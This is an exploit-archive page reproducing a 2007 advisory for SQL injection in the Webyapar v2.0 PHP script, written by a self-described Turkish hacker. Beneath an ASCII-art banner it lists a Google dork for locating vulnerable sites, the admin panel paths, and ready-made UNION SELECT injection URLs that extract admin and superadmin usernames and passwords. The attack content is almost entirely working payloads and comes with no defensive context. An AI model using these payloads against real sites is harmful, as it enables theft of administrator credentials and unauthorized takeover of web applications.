exploit-db-mirror/platforms/php/webapps/4224.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

81 lines
4.3 KiB
Text
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

#########################################################################################################################
#########################################################################################################################
############/$$$$$$$$$$$////$$$$$$$$$$$//###################///////////###############//$$$$$$$$$$$$$$$//$$$$$$$$$$$$$$$/
###///////##/$$$$$$$$//////////$$$$$$$$//####################/////////#####//////$$$$$//$$$$/////////////$$$$////////////
##///////###/$$$$$$$////////////$$$$$$$//#####///////////#####///////#####///////$$$$$//$$$$/////////////$$$$////////////
##//////###///$$$$$$$//////////$$$$$$$///#####///////////#####//////#####////////$$$$$//$$$$/////////////$$$$////////////
##/////###/////$$$$$$$////////$$$$$$$////#####//////////######/////#####/////////$$$$$//$$$$/////////////$$$$////////////
##////###///////$$$$$$$//////$$$$$$$/////######////////#######////#####//////////$$$$$//$$$$/////////////$$$$////////////
##///###/////////$$$$$$$////$$$$$$$//////#######//////#######////#####///////////$$$$$//$$$$/////////////$$$$////////////
###################$$$$$$##$$$$$$################################################$$$$$##$$$$$$$$$$$$$$$##$$$$$$$$$$$$$$$$
####################$$$$$$$$$$$$#################################################$$$$$##$$$$$$$$$$$$$$$##$$$$$$$$$$$$$$$$
##///###////////////$$$$$$$$$$$$/////////#########////////////#####//////////////$$$$$//$$$$$$$$$$$$$$$//$$$$$$$$$$$$$$$$
##////###////////////$$$$$$$$$$//////////########////////////#####///////////////$$$$$/////////////$$$$//////////////$$$$
##/////###////////////$$$$$$$$///////////#######////////////#####////////////////$$$$$/////////////$$$$//////////////$$$$
##//////###////////////$$$$$$////////////#######///////////#####/////////////////$$$$$/////////////$$$$//////////////$$$$
###//////##/////////////$$$$/////////////#######//////////#####//////////////////$$$$$/////////////$$$$//////////////$$$$
############/////////////$$//////////////#######/////////#####///////////////////$$$$$//$$$$$$$$$$$$$$$//$$$$$$$$$$$$$$$$
#########################################################################################################################
#########################################################################################################################
##### TURKISH SECURİTY MAN AND C0D3R ####################### MAİL : dumanhack@gmail.com ###########################
##### - ##### web : ##########
##### PERFECT C0D3R AND SECURİTY ## >>>>>>>>>>>>>> MESSAGE : HAYAT İLLEGAL <<<<<<<<<<<<<<< ##
#########################################################################################################################
# Title : webyapar v2.0 Remote Blind SQL Injection Vulnerability
# AUTHOR: : bypass
# script name : Webyapar v2.0 { 700$ }
# Language : Tr
# scritp web page : www.webyapar.com
# script bug : remote sql enjeksiyon
# script admin panel1 : http://victim/script_path/yonetim
# script admin panel2 : http://victim/script_path/yonetim2
# google dork : inurl:"?page=duyurular_detay&id="
#Message Tr : ingilizcem pek iyi degildir. kodun piyasada satıs degeri 700$ - kodun sql dısında xss acıklarıda bulunmaktadır
ama pek fazla xss acıkları işinize yaramayacaktır. yonetim panelleri standart verilmistir...
# Message Tr : Hayat İllegal - / -
< / -------------------------------------------------------------------------------------------------------- />
< / ------ Example sql bug 1 admin username : ------ / >
http://VİCTİM/SCRİPT_PATH/?page=download&kat_id=-116+union+all+select+0,kullanici+from+admin
< / ------ Example sql bug 1 admin password : ------ / >
http://VİCTİM/SCRİPT_PATH/?page=download&kat_id=-116+union+all+select+0,sifre+from+admin
< / ------ Example sql bug 2 superadmin password and admin username : ------ / >
http://VİCTİM/SCRİPT_PATH/?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+superadmin
< / -------------------------------------------------------------------------------------------------------- />
Sql enjeksiyon bug 1 : /?page=download&kat_id=-116+union+all+select+0,sifre+from+admin
Sql enjeksiyon bug 2 : /?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+admin
# milw0rm.com [2007-07-25]